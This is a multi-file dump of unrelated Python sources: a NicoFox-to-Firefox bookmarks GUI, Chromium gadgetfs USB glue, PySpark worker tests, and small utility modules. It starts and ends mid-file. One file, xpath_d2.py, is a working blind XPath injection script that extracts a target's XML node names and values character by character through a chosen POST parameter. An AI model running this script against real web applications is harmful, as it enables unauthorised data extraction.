return self._meta_source
@meta_source.setter
def meta_source(self, source):
self._meta_source = source
@property
def has_running_task(self):
self._clear_finished_tasks()
return bool(self._tasks)
@staticmethod
def _lookup_nicofox_path(profile):
"""Find the path to the NicoFox database and return it.
        First, look for the NicoFox database in the current working directory.
        If it is not there, look in the profile directory (when a profile is given).
        If it cannot be found anywhere, return None.
"""
NICOFOX_DATABASE_NAME = 'smilefox.sqlite'
# Find in current working directory.
nicofox_path = pathlib.Path(NICOFOX_DATABASE_NAME)
if nicofox_path.is_file():
return nicofox_path.absolute()
# Find in profile directory.
if profile is not None:
nicofox_path = pathlib.Path(profile.path, NICOFOX_DATABASE_NAME)
if nicofox_path.is_file():
return nicofox_path.absolute()
        # Not found anywhere.
return None
@staticmethod
def _lookup_bookmark_path(profile):
"""Find the path to the Firefox bookmarks backup and return it.
        First, look for a Firefox bookmarks backup with today's date in the current working directory.
        If it is not there and a profile is given, fall back to the most recent automatic bookmarks backup.
        If it cannot be found anywhere, return None.
        Note: using a manually created backup is highly recommended.
"""
# Find in current working directory.
bookmarks_filename_today = firefox_helper.get_bookmarks_backup_filename()
bookmark_path = pathlib.Path(bookmarks_filename_today)
if bookmark_path.is_file():
return bookmark_path.absolute()
        # Find the latest one in the profile directory.
if profile is not None:
bookmark_path = firefox_helper.get_last_firefox_bookmarks_backup_path(profile)
if bookmark_path is not None:
return bookmark_path.absolute()
        # Not found anywhere.
return None
@staticmethod
def _make_output_path():
"""Make the output filename and return it.
        The output filename is today's bookmarks backup filename suffixed with "-with-nicofox".
        e.g. bookmarks-yyyy-mm-dd-with-nicofox.json
        This function also avoids clashing with existing files: it appends "-<number>"
        to the end of the file stem, counting upward, until the filename does not exist.
e.g. bookmarks-yyyy-mm-dd-with-nicofox-2.json
"""
bookmarks_filename_today = firefox_helper.get_bookmarks_backup_filename()
output_path = pathlib.Path(bookmarks_filename_today)
stem = output_path.stem + '-with-nicofox'
ext = output_path.suffix
output_path = pathlib.Path(stem + ext)
if output_path.exists():
for suffix_num in itertools.count(2):
output_path = pathlib.Path(stem + '-' + str(suffix_num) + ext)
if not output_path.exists():
break
return output_path.absolute()
def _clear_finished_tasks(self):
self._tasks = [task for task in self._tasks if not task.done]
def close_all_dialogs(self):
"""Close all task dialogs. (but does NOT stop the tasks.)"""
for task in self._tasks:
task.close()
def start_port(self, root):
"""Collect information form UI and start porting task."""
assert self._path_source is not None
assert self._meta_source is not None
# Get current referred profile.
profile = self._profile_getter() if self._profile_getter is not None else None
# Collect path arguments and correct them.
nicofox_path = self._path_source.nicofox_path
bookmark_path = self._path_source.bookmark_path
output_path = self._path_source.output_path
if not nicofox_path:
nicofox_path = Processor._lookup_nicofox_path(profile)
if nicofox_path is None:
tk.messagebox.showwarning(__title__, _('NicoFox database path is required.'))
return
if not bookmark_path:
bookmark_path = Processor._lookup_bookmark_path(profile)
if bookmark_path is None:
tk.messagebox.showwarning(__title__, _('Bookmarks backup path is required.'))
return
if not output_path:
output_path = Processor._make_output_path()
self._path_source.nicofox_path = nicofox_path
self._path_source.bookmark_path = bookmark_path
self._path_source.output_path = output_path
# Collect metadata arguments and correct them.
metadata = nicofox2bookmarks.create_metadata()
metadata['container'] = self._meta_source.container or _('NicoFox')
metadata['description'] = self._meta_source.container_description\
or _('Bookmarks imported from NicoFox database using {}.').format(__title__)
metadata['common_tags'] = self._meta_source.common_tags
# Feedback the correct metadata to UI.
self._meta_source.container = metadata['container']
self._meta_source.container_description = metadata['description']
self._meta_source.common_tags = metadata['common_tags']
# Setup task parameters and start task.
task_param = {
'nicofox_path': nicofox_path,
'bookmark_path': bookmark_path,
'output_path': output_path,
'metadata': metadata,
}
if len(self._tasks) >= 8:
self._clear_finished_tasks()
self._tasks.append(TaskDialog(root, task_param))
def _on_root_close(root, processor):
if processor.has_running_task:
to_close = tk.messagebox.askyesno(
__title__,
_('There are still running task(s). Close this window will NOT stop them.\n'
'Do you want to close it?'))
        if not to_close:  # askyesno() returns a bool, not the string tk.NO
return
processor.close_all_dialogs()
root.destroy()
def main():
"""Main function."""
# Load configs and setup i18n.
config = _load_configs()
_setup_i18n(config)
# Setup root window.
root = tk.Tk()
root.title(__title__ + ' ver.' + __version__)
root.resizable(width=True, height=False)
# Setup profiles selector.
profiles_selector = ProfilesSelector(root)
profiles_selector.load_profiles()
profiles_selector.pack(fill=tk.BOTH)
# Setup processor.
processor = Processor()
processor.profile_getter = lambda: profiles_selector.selected_profile
# Setup path panel.
path_panel = PathPanel(root)
path_panel.pack(fill=tk.BOTH)
processor.path_source = path_panel
# Setup meta panel.
meta_panel = MetaPanel(root)
meta_panel.pack(fill=tk.BOTH)
processor.meta_source = meta_panel
# Setup OK button.
ok_button = tk.ttk.Button(root, text=_('Start Port'), command=lambda: processor.start_port(root))
ok_button.pack(fill=tk.BOTH)
# Optimize the root window size.
root.update_idletasks()
width, height, x, y = _get_widget_geometry(root)
if width < _STARTUP_MIN_WIDTH:
width = _STARTUP_MIN_WIDTH
_set_widget_geometry(root, width, height, x, y)
# Start GUI.
root.protocol('WM_DELETE_WINDOW', lambda: _on_root_close(root, processor))
root.mainloop()
if __name__ == '__main__':
main()
|
linux_gadgetfs.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Linux gadgetfs glue.
Exposes a USB gadget using a USB peripheral controller on Linux. The userspace
ABI is documented here:
https://github.com/torvalds/linux/blob/master/drivers/usb/gadget/inode.c
"""
import errno
import multiprocessing
import os
import struct
from tornado import ioloop
import usb_constants
import usb_descriptors
GADGETFS_NOP = 0
GADGETFS_CONNECT = 1
GADGETFS_DISCONNECT = 2
GADGETFS_SETUP = 3
GADGETFS_SUSPEND = 4
BULK = 0x01
INTERRUPT = 0x02
ISOCHRONOUS = 0x04
USB_TRANSFER_TYPE_TO_MASK = {
usb_constants.TransferType.BULK: BULK,
usb_constants.TransferType.INTERRUPT: INTERRUPT,
usb_constants.TransferType.ISOCHRONOUS: ISOCHRONOUS
}
IN = 0x01
OUT = 0x02
HARDWARE = {
'beaglebone-black': (
'musb-hdrc', # Gadget controller name,
{
0x01: ('ep1out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x81: ('ep1in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x02: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x82: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x03: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x83: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x04: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x84: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x05: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x85: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x06: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x86: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x07: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x87: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x08: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x88: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x09: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x89: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0A: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8A: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0B: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8B: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0C: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8C: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0D: ('ep13', BULK | INTERRUPT | ISOCHRONOUS, 4096),
0x8D: ('ep13', BULK | INTERRUPT | ISOCHRONOUS, 4096),
0x0E: ('ep14', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x8E: ('ep14', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x0F: ('ep15', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x8F: ('ep15', BULK | INTERRUPT | ISOCHRONOUS, 1024),
}
)
}
class LinuxGadgetfs(object):
"""Linux gadgetfs-based gadget driver.
"""
def __init__(self, hardware, mountpoint='/dev/gadget'):
"""Initialize bindings to the Linux gadgetfs interface.
Args:
hardware: Hardware type.
mountpoint: Gadget filesystem mount point.
"""
self._chip, self._hw_eps = HARDWARE[hardware]
self._ep_dir = mountpoint
self._gadget = None
self._fd = None
# map from bEndpointAddress to hardware ep name and open file descriptor
self._ep_fds = {}
self._io_loop = ioloop.IOLoop.current()
def Create(self, gadget):
"""Bind a gadget to the USB peripheral controller."""
self._gadget = gadget
self._fd = os.open(os.path.join(self._ep_dir, self._chip), os.O_RDWR)
buf = ''.join([struct.pack('=I', 0),
gadget.GetFullSpeedConfigurationDescriptor().Encode(),
gadget.GetHighSpeedConfigurationDescriptor().Encode(),
gadget.GetDeviceDescriptor().Encode()])
os.write(self._fd, buf)
self._io_loop.add_handler(self._fd, self.HandleEvent, self._io_loop.READ)
def Destroy(self):
"""Unbind the gadget from the USB peripheral controller."""
self.Disconnected()
self._io_loop.remove_handler(self._fd)
os.close(self._fd)
self._gadget = None
self._fd = None
def IsConfigured(self):
return self._gadget is not None
def HandleEvent(self, unused_fd, unused_events):
buf = os.read(self._fd, 12)
event_type, = struct.unpack_from('=I', buf, 8)
if event_type == GADGETFS_NOP:
print 'NOP'
elif event_type == GADGETFS_CONNECT:
speed, = struct.unpack('=Ixxxxxxxx', buf)
self.Connected(speed)
elif event_type == GADGETFS_DISCONNECT:
self.Disconnected()
elif event_type == GADGETFS_SETUP:
request_type, request, value, index, length = struct.unpack(
'<BBHHHxxxx', buf)
self.HandleSetup(request_type, request, value, index, length)
elif event_type == GADGETFS_SUSPEND:
print 'SUSPEND'
else:
print 'Unknown gadgetfs event type:', event_type
def Connected(self, speed):
print 'CONNECT speed={}'.format(speed)
self._gadget.Connected(self, speed)
def Disconnected(self):
print 'DISCONNECT'
for endpoint_addr in self._ep_fds.keys():
self.StopEndpoint(endpoint_addr)
self._ep_fds.clear()
self._gadget.Disconnected()
def HandleSetup(self, request_type, request, value, index, length):
print ('SETUP bmRequestType=0x{:02X} bRequest=0x{:02X} wValue=0x{:04X} '
'wIndex=0x{:04X} wLength={}'
.format(request_type, request, value, index, length))
if request_type & usb_constants.Dir.IN:
data = self._gadget.ControlRead(
request_type, request, value, index, length)
if data is None:
print 'SETUP STALL'
try:
os.read(self._fd, 0) # Backwards I/O stalls the pipe.
except OSError, e:
# gadgetfs always returns EL2HLT which we should ignore.
if e.errno != errno.EL2HLT:
raise
else:
os.write(self._fd, data)
else:
data = ''
if length:
data = os.read(self._fd, length)
result = self._gadget.ControlWrite(
request_type, request, value, index, data)
if result is None:
print 'SETUP STALL'
try:
os.write(self._fd, '') # Backwards I/O stalls the pipe.
except OSError, e:
# gadgetfs always returns EL2HLT which we should ignore.
if e.errno != errno.EL2HLT:
raise
elif not length:
# Only empty OUT transfers can be ACKed.
os.read(self._fd, 0)
def StartEndpoint(self, endpoint_desc):
"""Activate an endpoint.
To enable a hardware endpoint the appropriate endpoint file must be opened
and the endpoint descriptors written to it. Linux requires both full- and
high-speed descriptors to be written for a high-speed device but since the
endpoint is always reinitialized after disconnect only the high-speed
endpoint will be valid in this case.
Args:
endpoint_desc: Endpoint descriptor.
Raises:
RuntimeError: If the hardware endpoint is in use or the configuration
is not supported by the hardware.
"""
endpoint_addr = endpoint_desc.bEndpointAddress
name, hw_ep_type, hw_ep_size = self._hw_eps[endpoint_addr]
if name in self._ep_fds:
raise RuntimeError('Hardware endpoint {} already in use.'.format(name))
ep_type = USB_TRANSFER_TYPE_TO_MASK[
endpoint_desc.bmAttributes & usb_constants.TransferType.MASK]
ep_size = endpoint_desc.wMaxPacketSize
if not hw_ep_type & ep_type:
raise RuntimeError('Hardware endpoint {} does not support this transfer '
'type.'.format(name))
elif hw_ep_size < ep_size:
raise RuntimeError('Hardware endpoint {} only supports a maximum packet '
'size of {}, {} requested.'
.format(name, hw_ep_size, ep_size))
fd = os.open(os.path.join(self._ep_dir, name), os.O_RDWR)
buf = struct.pack('=I', 1)
if self._gadget.GetSpeed() == usb_constants.Speed.HIGH:
# The full speed endpoint descriptor will not be used but Linux requires
# one to be provided.
full_speed_endpoint = usb_descriptors.EndpointDescriptor(
bEndpointAddress=endpoint_desc.bEndpointAddress,
bmAttributes=0,
wMaxPacketSize=0,
bInterval=0)
buf = ''.join([buf, full_speed_endpoint.Encode(), endpoint_desc.Encode()])
else:
buf = ''.join([buf, endpoint_desc.Encode()])
os.write(fd, buf)
pipe_r, pipe_w = multiprocessing.Pipe(False)
child = None
# gadgetfs doesn't support polling on the endpoint file descriptors (why?)
# so we have to start background threads for each.
if endpoint_addr & usb_constants.Dir.IN:
def WriterProcess():
while True:
data = pipe_r.recv()
written = os.write(fd, data)
print('IN bEndpointAddress=0x{:02X} length={}'
.format(endpoint_addr, written))
child = multiprocessing.Process(target=WriterProcess)
self._ep_fds[endpoint_addr] = fd, child, pipe_w
else:
def ReceivePacket(unused_fd, unused_events):
data = pipe_r.recv()
print('OUT bEndpointAddress=0x{:02X} length={}'
.format(endpoint_addr, len(data)))
self._gadget.ReceivePacket(endpoint_addr, data)
def ReaderProcess():
while True:
data = os.read(fd, ep_size)
pipe_w.send(data)
child = multiprocessing.Process(target=ReaderProcess)
pipe_fd = pipe_r.fileno()
self._io_loop.add_handler(pipe_fd, ReceivePacket, self._io_loop.READ)
self._ep_fds[endpoint_addr] = fd, child, pipe_r
child.start()
print 'Started endpoint 0x{:02X}.'.format(endpoint_addr)
def StopEndpoint(self, endpoint_addr):
"""Deactivate the given endpoint."""
fd, child, pipe = self._ep_fds.pop(endpoint_addr)
pipe_fd = pipe.fileno()
child.terminate()
child.join()
if not endpoint_addr & usb_constants.Dir.IN:
self._io_loop.remove_handler(pipe_fd)
os.close(fd)
print 'Stopped endpoint 0x{:02X}.'.format(endpoint_addr)
def SendPacket(self, endpoint_addr, data):
"""Send a packet on the given endpoint."""
_, _, pipe = self._ep_fds[endpoint_addr]
pipe.send(data)
def HaltEndpoint(self, endpoint_addr):
"""Signal a stall condition on the given endpoint."""
    fd, _, _ = self._ep_fds[endpoint_addr]  # stored as (fd, child process, pipe)
# Reverse I/O direction sets the halt condition on the pipe.
try:
if endpoint_addr & usb_constants.Dir.IN:
os.read(fd, 0)
else:
os.write(fd, '')
except OSError, e:
# gadgetfs always returns EBADMSG which we should ignore.
if e.errno != errno.EBADMSG:
raise
|
util.py
|
# -*- coding: utf-8 -*-
"""
syslog2irc.util
~~~~~~~~~~~~~~~
Various utilities
:Copyright: 2007-2015 Jochen Kupperschmidt
:License: MIT, see LICENSE for details.
"""
import logging
from threading import Thread
logging.basicConfig(format='%(asctime)s | %(message)s', level=logging.INFO)
def log(message, *args, **kwargs):
"""Log the message with a timestamp."""
logging.info(message.format(*args, **kwargs))
def start_thread(target, name):
"""Create, configure, and start a new thread."""
t = Thread(target=target, name=name)
t.daemon = True
t.start()
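# Example: start a daemonized background worker (the thread name is arbitrary).
#   start_thread(lambda: log('worker {} started', 'demo'), 'demo-worker')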
|
xpath_d2.py
|
import requests
import sys
from urllib.parse import unquote,quote
import multiprocessing
headers=dict()
post_parameters=dict()
cookies=dict()
iparam=sys.argv[1]
true_string=sys.argv[2].strip("\"")
element_range = 20
element_length = 40
value_length = 40
data_length=40
req = open("request.r","r").read().split("\n")
url = "https://" + req[1].split(": ")[1] + req[0].split(" ")[1]
for i in range(2,len(req)):
if req[i] == "":
post_body = req[i+1]
break
temp = req[i].split(": ")
headers[temp[0]] = temp[1]
for i in post_body.split("&"):
temp = i.split("=",1)
post_parameters[temp[0]] = unquote(temp[1])
cookies["a"]="b"
headers.pop("Cookie")
headers.pop("Content-Length")
def true_condition(resp):
if (str(resp).find(true_string) != -1):
return 1
else:
return 0
sess = []
def mp(inject,i,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if(true_condition(r.content)):
q.append(i)
def mp_len(inject,i,j,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if(true_condition(r.content)):
temp=[]
temp.append(j)
temp.append(i)
q.append(temp)
def mp_tag(inject,m,k,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if (true_condition(r.content)):
temp = []
temp.append(m)
temp.append(k)
q.append(temp)
def engine(prefix,level):
jobs = []
# No. of child elements
q = multiprocessing.Manager().list()
for i in range(1,element_range+1):
orig = post_parameters[iparam]
inject = orig + " and name("+prefix+"/*["+str(i)+"])"
p = multiprocessing.Process(target=mp, args=(inject,i,q))
jobs.append(p)
p.start()
# nlen=i
for job in jobs:
job.join()
try:
nlen = max(q)
except:
nlen = 0
print("No. of nodes at level "+str(level) + ":" + str(nlen))
post_parameters[iparam] = orig
# String length of each element
slen = []
jobs = []
qt = multiprocessing.Manager().list()
for j in range(1, nlen + 1):
orig = post_parameters[iparam]
for i in range(1, element_length):
inject = orig + " and string-length(name(" + prefix + "/*[" + str(j) + "]))=" + str(i)
p = multiprocessing.Process(target=mp_len,args=(inject,i,j,qt))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt.sort()
for a in qt:
slen.append(a[1])
#print("String length of node" + str(a[0]) + " at level " + str(level) + ":" + str(a[1]))
# try:
# slen.append(max(qt))
# except:
# slen.append(0)
# print("String length of node" + str(j) + " at level " + str(level) + ":" + str(slen[j-1]))
# Name and Data of each element
chars = open("char", "r").read().split("\n")[:-1]
for j in range(0, nlen):
qt2 = multiprocessing.Manager().list()
for m in range(1, slen[j] + 1):
jobs = []
for k in chars:
inject = orig + " and substring(name(" + prefix + "/*[" + str(j + 1) + "])," + str(
m) + ",1)='" + k + "'"
p = multiprocessing.Process(target=mp_tag,args=(inject,m,k,qt2))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt2.sort()
nn = ""
for l1 in qt2:
nn+=str(l1[1])
print(nn)
#Data
jobs = []
# Value Length
qt5 = multiprocessing.Manager().list()
for i in range(1, value_length+1):
orig = post_parameters[iparam]
inject = orig + " and string-length(" + prefix + "/*["+str(j+1)+"])=" + str(i)
p = multiprocessing.Process(target=mp, args=(inject, i, qt5))
jobs.append(p)
p.start()
for job in jobs:
job.join()
# print(list(qt5))
if list(qt5) == []:
vlen=0
else:
vlen= max(qt5)
# print("Value string length : " + str(vlen))
post_parameters[iparam] = orig
# Value Name
qt3 = multiprocessing.Manager().list()
jobs = []
for u in range(1, vlen+1):
for k in chars:
inject = orig + " and substring(" + prefix + "/*["+str(j+1)+"]," + str(u) + ",1)='" + k + "'"
p = multiprocessing.Process(target=mp_tag, args=(inject, u, k, qt3))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt3.sort()
nn = ""
for l1 in qt3:
nn += str(l1[1])
print("\t",nn)
# level += 1
# prefix += "/*"
prefix = sys.argv[3].strip("\"")
level=1
# prefix =""
engine(prefix,level)
# for i in range(20):
# sess.append(session.get('http://httpbin.org/get'))
# for i in range(20):
# print(sess[i].result().content)
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource # noqa: F401
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, "w") as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(" ")
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
pass
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
        # SPARK-33339: a PySpark application will hang due to a non-Exception error
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
        # SPARK-21045: exceptions with no ascii encoding must not hang PySpark.
try:
def f():
raise RuntimeError("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module or sys.platform != "linux",
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.",
)
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext("local[4]", class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now.",
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
utils.py
|
"""Utilities module for the textbook "What Can Be Computed?" (WCBC)
This "utils" module provides various supporting functions for use with
the programs provided in the online materials for the textbook "What Can
Be Computed?" (WCBC). (For an overview of the entire collection of
programs, see the file README.txt in this directory.)
Functionality provided by the utils module includes: reading and
writing text files, extracting names of functions from Python files
(useful for universal computation simulations), encoding multiple
strings as single strings and vice versa, creating random strings of
various kinds, manipulating alphabets such as the ASCII alphabet,
executing code with a timeout (in case it runs for a long time or
forever), formatting sets of strings, manipulating solutions of
nondeterministic programs, an exception class specific to WCBC,
facilities for testing.
"""
# The following line improves compatibility with Python version 2.x
from __future__ import print_function
# Check that the version of Python being used is sufficiently recent.
import sys
def checkPythonVersion(shouldExit=True):
"""Check that the version of Python is recent enough (>=2.7).
If the version is too old, exit Python immediately unless instructed otherwise.
Args:
shouldExit (bool): Indicates the action that should be taken
if the version of Python is too old. If True, exit
immediately. Otherwise, print a warning message but then
return.
"""
if sys.version_info < (2, 7):
print("Sorry, but there's a problem: you need Python version at least 2.7. Exiting now.")
if shouldExit:
sys.exit()
checkPythonVersion()
# Import all the modules we need.
import re, sys, threading, random, time, os, os.path
# Importing the queue module is a little tricky, since the name was
# changed in version 3. The following code takes care of this issue.
if sys.version_info < (3, 0):
import Queue
queue = Queue
else:
import queue
haltComputations = threading.Event()
"""An event that signals long-running computations to exit."""
aRandom = random.Random()
"""A random number generator that can be used by all functions that
want one.
"""
inf = float("inf")
"""A value representing positive infinity.
In version >= 3.5 of Python, math.inf would be more elegant here, but
it's better to use an idiom that also works with earlier versions of
Python.
"""
def extractMainFunctionName(progString):
"""Extract the name of the main function in a Python program.
Given a Python program as defined in the book, return a string
containing the name of the "main" function: that is, the first
Python function defined within progString. This is done by
searching for the first line that begins with the characters "def"
followed by whitespace, then returning the identifier immediately
following that whitespace. Clearly, this is not infallible, but it
works for all of the example programs provided with the book
materials. If desired, one could use Python parsing tools to
locate the first defined function with perfect reliability. But
that approach is more complex than we need for the illustrative
examples provided with the book.
Args:
progString (str): string containing the Python program to be
examined.
Returns:
str: The name of the main function if one could be found,
otherwise the empty string.
"""
# This is the regular expression that searches for the main
# function using the heuristic described above.
mainFunctionRegex = r"^def\s+([a-zA-Z0-9_]*)"
matchResult = re.search(mainFunctionRegex, progString, re.MULTILINE)
if matchResult:
return matchResult.group(1)
else:
# Return empty string if we couldn't find any function
# definitions. This should never happen when processing a
# legitimate SISO program.
return ""
def extractMainFunction(progString, localVars):
"""Given a Python program as defined in the book, return a reference
to the "main" function: that is, the first Python function defined
    within progString. The localVars parameter should be the locals()
    dictionary of the calling function, as described under Args below.
Args:
progString (str): string containing the Python program to be
examined.
localVars (dict): the "locals()" dictionary of the calling
function, as explained further in the source code comment.
Returns:
fn: A reference to the main function if one could be
found. Otherwise a WcbcException is raised.
"""
functionName = extractMainFunctionName(progString)
# Python has a standard built-in dictionary called "locals()"
# which contains, among other things, all the functions that are
# currently defined. We can get a reference to the desired
# function by looking it up in this dictionary, using the name of
# the function as the key.
if functionName in localVars:
progFunction = localVars[functionName]
else:
raise WcbcException(
"function " + functionName + " not defined, so cannot extract or simulate it"
)
return progFunction
def readFile(fileName):
"""Read a file, returning its contents as a single string.
Args:
fileName (str): The name of the file to be read.
Returns:
str: The contents of the file.
"""
fileContents = ""
with open(fileName) as inputFile:
fileContents = inputFile.read()
return fileContents
# Define a very short convenient alias for the readFile function
rf = readFile
def writeFile(fileName, fileContents):
"""Write a file, overwriting any existing content with the given content.
Args:
fileName (str): The name of the file to be written or overwritten.
fileContents (str): The contents of the file to be written,
stored as a single string that may contain newlines.
"""
with open(fileName, "w") as outputFile:
outputFile.write(fileContents)
def ESS(inString1, inString2):
"""Encode two strings as a single string.
ESS is an acronym for Encode as Single String. This function uses
the encoding method suggested in the textbook: the encoding
